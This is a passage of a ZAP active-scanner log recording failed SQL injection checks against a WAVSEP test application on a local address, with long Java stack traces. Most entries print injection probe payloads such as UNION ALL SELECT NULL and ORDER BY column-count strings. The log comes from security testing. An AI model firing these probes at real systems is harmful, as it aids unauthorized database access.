at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681407 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681408 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681409 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681409 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681410 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 8925-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') ORDER BY 8925-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681410 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681412 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681412 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681413 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681413 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681414 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681414 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' ORDER BY 7809-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' ORDER BY 7809-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681415 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') UNION ALL SELECT 